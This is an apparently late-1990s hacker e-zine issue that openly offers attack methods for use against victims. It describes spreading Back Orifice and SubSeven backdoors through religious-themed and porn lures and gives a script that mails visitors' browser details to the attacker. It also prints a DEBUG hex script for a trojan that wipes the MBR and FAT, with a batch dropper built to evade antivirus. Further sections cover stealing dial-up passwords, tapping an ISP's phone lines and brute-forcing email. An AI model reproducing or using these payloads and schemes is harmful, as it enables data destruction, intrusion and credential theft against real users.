   88888888888888888888888888888888888888888888888888888888888888888888888
   88888888888888888888888888888888888888888888888888888888888888888888888
   888                                                                 888
   888                                                                 888
   888              t h e  b l i z z a r d  o f  o z                   888
   888                                                                 888
   888                                                                 888
   88888888888888888888888888888888888888888888888888888888888888888888888
   88888888888888888888888888888888888888888888888888888888888888888888888
   888888888888888888 issue one five.six.ninetynine 8888888888888888888888
   88888888888888888888888888888888888888888888888888888888888888888888888


   editor - the plague
   articles - the plague
   design - the plague
   help - i really could use some

     if you got any mother fuckin' thing sittin' around on your drive
    that could do any mother fucker any good send it over now.  i need
     articles a.s.a.p .. im a one man army but im not invincible..


   alright... moving on..

  8888888888888888888888888888888888888888888888888888888888888888888888888   
  888888888 t a b l e  o f  c o n t e n t s . .  8888888888888888888888888
  8888888888888888888888888888888888888888888888888888888888888888888888888
  section one                             sub orifice and back seven

  section two                             the wicked witch trojan

  section three                           free dialup for life

  section four                            this y2k shit is pissin me off
  8888888888888888888888888888888888888888888888888888888888888888888888888




  88888888888888888888888888888888888888888888888888888888888888888888888888
  8888888888888  s e c t i o n  o n e 88888888888888888888888888888888888888
  88888888888888888888888888888888888888888888888888888888888888888888888888

  okay here we go... being the deviant mother fucker that i am im always
  lookin for a way to strike back.. not necessarilly fight the power but
  maybe slap his friends around a little.  so off i went in search of
  something to help me, and for the longest time shit.. nothing.. then
  one day i downed a copy of back orifice.. if you dont have it go fucking
  get it .. the cdc  has a website its no fucking problem.. anyway so i
  starting finding ways to victimize people for my own wicked purposes..
  and then i got a copy of subseven 1.5 and blam it hit me.. theres no
  reason i shouldn't have a gigantic resource of pc's at my disposal..
  ( so maybe im a little powerhungry. ) so im gonna detail a couple of
  high quality schemes to implement these bastards for quality control..


  scheme #1 - fool the christians -
  pretty simple..hit me one day while i was walkin' to porno shop.. why not
  use their love of christ to my benefit?  heres the trick.. get online
  go find yourself a nice little christian chat room.. it dosent matter
  what you use as long as they have email addresses listed in the room
  source.. i used cgn (or is it gcn?) a lot.. just register pop in there
  view the html source for the room and copy all email addresses that go
  to local providers.. then send them some bullshit email about the love
  of the lord and make up some bullshit line about some great new program
  they gotta try.. i used the new praise jesus calender and then made a
  self extracting zip for software installation with no prompt.. which
  means it will automatically unzip and then run your batch file.. making
  them a certified owner of a backdoor .. so put bo or subseven in there
  and if you name it setup then ie will run it for them as soon as its done
  downloading.. make sure you echo the batch file with a message about
  not enough memory to run jesus software and in the email tell them
  to mail you if they have any trouble..  well then thier gonna mail you
  take thier address from the header and scan the subnet ... who knows
  you might just have a new friend..

  scheme #2 - the web page auto email crack ho method -
  alright this mofo is moderately successful heres the deal slap this
  code in your web page (xoom's got free space so dont tell me you
  cant go get one bitch )

<SCRIPT>

function submitit() {
   document.forms[0].method="get"
   document.forms[0].encoding="text/plain"        
   setTimeout ('document.location.href="pagetogoto.html"',5000)
   document.forms[0].action="mailto:youremailaddress@crack.com"
   document.forms[0].goodies.value=document.referrer+"_"+navigator.userAgent;
}
</SCRIPT>
<FORM onSubmit='submitit();return true'>
<input type="submit" value="button text here">
<INPUT TYPE="hidden" NAME="goodies">
</FORM>


now what the hell do i do with this.. change the mail to some crackass
email address you got layin' around.. go get one.. i use flashemail for
shit like this..but anything will work.. change pagetogoto.html to the
page you want to link the button to.. this works for an enter page on
the site.. and change button text here to whatever the hell you want..
alright... so what this does is pop up a little deal that warns the
user they are submitting system information via email.. bla bla bla
most people are just gonna click okay.. then if they have thier email
setup... it will send you an automail to above address... thats the
easy one.. next make a quality trojan except not that christian
madness.. for this i would go with hardcore porn.. it moves fast..
and make sure they will download it.. make them want to download it.
and if i were you id get a counter to.. that way you can keep track
of who hit your page and didnt download your shit.. and there are
tons of ways to get traffic on your site for free .. so just go
search.. or try www.webpromote.com they a promo deal to add your
site to 25 services for free.. its kinda time consuming but hey
rome wasnt built in a day you worthless fucks.. alright..

okay now get out there and take over some shit you mofo's...
          kill     kill          kill        kill


88888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888 s e c t i o n  t w o 888888888888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888

  didja ever really just wanna fuck somebody's shit up? just really cause
 them a lot of pain and trouble?  well go get a baseball bat you fucking
 idiot. okay not really.. well me too, but how can i get past thier virus
 protection software.. well you could always break into thier house..naaah..
 too messy.. how bout' you just hit em' when thier not lookin'.. ever heard
 of the noware man utils'?  go get them now (members.xoom.com/plague4ever/)
 and yea i am gonna change the main page pretty soon.. its good it just needs
 a little something... okay.. theres a great little program in there called
 cipher that you can use to trick the virus scanner.. but first heres the
 hex for the blizzard of oz's first ever trojan .. its not much but hey
 it does the job.. this bitch wipes the first 10 sectors (mbr, fat table)
 off the victim's drive and says "ill get you my pretty and your little
 drive too..." so heres the debug script for wkdwitch.com you need the
 dbgscrpt file from noware utils. read the docs if you cant figure it out.
 if you want the source mail me and ill send it to you..


N WKDWITCH.COM
E 0100 E9 3E 00 B4 09 BA 0D 01 CD 21 E9 4A 00 69 6C 6C 
E 0110 20 67 65 74 20 79 6F 75 20 6D 79 20 70 72 65 74 
E 0120 74 79 20 61 6E 64 20 79 6F 75 72 20 6C 69 74 74 
E 0130 6C 65 20 64 72 69 76 65 20 74 6F 6F 2E 2E 2E 24 
E 0140 00 B4 03 B0 01 B5 00 B1 01 B6 00 B2 80 0E 07 BB 
E 0150 17 01 CD 13 E9 AC FF B8 00 4C CD 20 
RCX
005C
W
Q


there it iz.. okay now compile this and test it out on your own pc..
or maybe not.. compile it and then make a batch file like this..

@echo
rem wow i sure do suck if i cant even write a fucking batch file
echo soorrryy. not enough memory to run the bullshit software
echo your dumbass never got.. you little bitchez..
cipher blizzardofoz friend.com
friend.com


well thats it.. now cipher wkdwitch.com with a key.. and remember that
key.. put it in place of blizzard of oz.. zip the ciphered wkdwitch.com
with this batch file and maybe a little padding like a big gif file or
something.. make that zip a self-extractor with autounzip and tell it to
run this batch file when its done.. blam.. the victim will be a sorry
little bitch. i would say and use this responsibly.. or maybe only you
can prevent forest fires.. but you know what.. i dont give a fuck and
so do whatever the hell you want with it.. cya.


88888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888888   s e c t i o n  t h r e e 888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888

yea.. my favorite section.. free dial-up for life.. sounds too good to be
true.. not so.. not so.. its a fuckin' piece of cake.. there are three
main methods of getting dial-ups.. method one .. hack the dialup account..
use back orifice. or subseven. section one details a good method for it..
snatch up thier pwl's work your magic.. be forewarned pwltoolz only cracks
up to 3 charachters so if i were you id use bo's get system pass it looks
for cached passwords via windows api ... thats a big fuckin slip on micro-
softs part.. its too damn easy.. or if you dont like pwltoolz and you have
access to the pc try dripper it just rips dialup accounts... its on my
archive page.. okay thats the easy way . now for the not so easy way..

method two ... its not crazy i swear .. dont try this unless your a real
sneaky mofo.. get a quality phonetap setup go to radiocrack or order
it online or hell card it.. or swipe it.. get your mom to buy it just
get one.. take a trip to all the isp's in town.. look them over real
good and pick out your victim.. then locate the large gray box in the
back of thier building and whip out your handset.. if you dont have a
handset get a modular plugin and a small phone and wire a red and green
wire with alligator clips on it to the modular plugin plug your phone in
pop open the box .. and connect up to a couple lines .. try to find one of
the office lines.. just make sure the line your on isnt a data line..
then hook up the tap and wrap your recorder in plastic and bury it
right under the phone box.. looks like a cable run into the ground..
no one will ever notice come back in a couple of days and get all that
shit go home and write down your new user name and password.. blam..

method three ... for those of us with a little time .. you need to get
the email cracker .. its on my archive page too .. then go find a nice
word list .. make sure its in the same format as the sample piece of
shit that comes with the popcracker and then pick out your victim..
better make it a good one cuz your gonna have to work for this. setup
the cracker and let it run til it figures out the pass.. and it will
eventually if you have a good wordlist.. and thats it... 

88888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888 s e c t i o n  f o u r 8888888888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888


this y2k shit is really pissin' me off...

why? well ill tell ya.. the world as we know it is not going to come to an
end.. surprise. the media is blowin' this shit all out of proportion when in
all reality ill tell ya whats gonna happen,  nothing. it sucks for people
like me who just want free information because now im viewed as a major
threat to all the sheep in big brothers special herd.  its a known fact that
the fbi and all its droogies are on the warpath for anyone related with the
"internet underground" like its some fucking secret society or some shit..
how clueless can people with so many resources be. give me one day with the
fbi's equipment and it would be a whole new deal .. and i really dont like
this cute little abbreviation the media has plasterd on ever newscast and
magazine cover from here to fucking sudan. Y2K .. the Y2K bug.. oh no were
all gonna die the evil Y2K virus is gonna come in through my cable and
scramble all my porno channels.. its gonna destroy the economy and lead to
the abolishment of government.. fucking shit people wake the fuck up.. its
just not like that.. yea sure there will be some pc failures .. other
products whose designers weren't thinking about the future might have some
trouble but for joe citizen its no problem.. and i dont wanna hear anymore
about "the signs of the apocalypse" or "the coming of the antichrist" who
knows maybe im the antichrist.. maybe i will run the world from my pc with
all the awesome power of the Y2K bug at my disposal.. i could topple empires.
and on that note i am the fuck outta here.

8888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888 a w o r d  f r o m  o u r  s p o n s o r 8888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888888888888888


hey.. all you mother fuckers out there who have ideas burning holes in your
thick skulls.. write that shit down.. type it out.. mail it to me.. i will
put anything in here that seems remotely feasible.. i fucking mean it..
editorials.. articles.. scams.. what the fuck ever.. i dont care.. just
send it ..  oh yea and dont let the horrible Y2K virus get you too...

88888888888888888888888888888888888888888888888888888888888888888888888888888
888888888 t h e _ p l a g u e @ f l a s h e m a i l . c o m 88888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888

88888888888888888888888888888888888888888888888888888888888888888888888888888
88888  mad props 2 - krypto - mohawk punk and the ocpp - 420 - hype 888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888




